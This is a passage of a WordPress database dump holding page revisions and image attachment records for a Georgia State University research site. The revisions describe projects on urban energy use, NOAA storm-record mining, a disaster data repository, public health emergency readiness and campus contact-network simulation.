reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:40:35','2023-09-29 14:40:35','',126,'https://gsudice.dataconn.net/?p=1493',0,'revision','',0),(1499,1,'2023-09-29 10:41:07','2023-09-29 14:41:07','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:41:07','2023-09-29 14:41:07','',438,'https://gsudice.dataconn.net/?p=1499',0,'revision','',0);
INSERT INTO `wp_posts` VALUES (1500,1,'2023-09-29 10:41:07','2023-09-29 14:41:07','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:41:07','2023-09-29 14:41:07','',126,'https://gsudice.dataconn.net/?p=1500',0,'revision','',0),(1505,1,'2023-09-29 10:42:13','2023-09-29 14:42:13','','Picture1','','inherit','open','closed','','picture1','','','2023-09-29 10:42:13','2023-09-29 14:42:13','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/Picture1.jpg',0,'attachment','image/jpeg',0),(1506,1,'2023-09-29 10:42:27','2023-09-29 14:42:27','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Picture1.jpg','cropped-Picture1.jpg','','inherit','open','closed','','cropped-picture1-jpg','','','2023-09-29 10:42:27','2023-09-29 14:42:27','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Picture1.jpg',0,'attachment','image/jpeg',0),(1508,1,'2023-09-29 10:42:54','2023-09-29 14:42:54','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-Picture1.jpg','cropped-cropped-Picture1.jpg','','inherit','open','closed','','cropped-cropped-picture1-jpg','','','2023-09-29 10:42:54','2023-09-29 14:42:54','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-Picture1.jpg',0,'attachment','image/jpeg',0),(1509,1,'2023-09-29 10:43:34','2023-09-29 14:43:34','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"50\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require 